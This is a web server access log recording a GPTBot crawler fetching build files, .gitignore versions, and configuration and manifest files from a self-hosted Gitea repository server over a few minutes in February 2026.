"/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10239] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16831] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15435] [Gzip 8.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10240] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15367] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15368] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15366] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21441] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" -[17/Feb/2026:16:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:16:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:16:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" -[17/Feb/2026:16:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" -[17/Feb/2026:16:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" -[17/Feb/2026:16:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" -[17/Feb/2026:16:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" -[17/Feb/2026:16:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" -[17/Feb/2026:16:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11794] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" -[17/Feb/2026:16:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11577] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:16:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11583] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:16:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11585] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:16:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" -[17/Feb/2026:16:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" -[17/Feb/2026:16:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" -[17/Feb/2026:16:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" -[17/Feb/2026:16:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" -[17/Feb/2026:16:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" -[17/Feb/2026:16:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" -[17/Feb/2026:16:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore?display=source" [Client 74.7.227.38] [Length 11000] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" -[17/Feb/2026:16:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" -[17/Feb/2026:16:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore?display=source" [Client 74.7.227.38] [Length 12044] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" -[17/Feb/2026:16:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore?display=source" [Client 74.7.227.38] [Length 12043] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" -[17/Feb/2026:16:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore?display=source" [Client 74.7.227.38] [Length 10999] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" -[17/Feb/2026:16:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10940] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 23952] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:16:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 20992] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:16:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 20962] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:16:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 23954] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:16:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 23969] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:16:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr 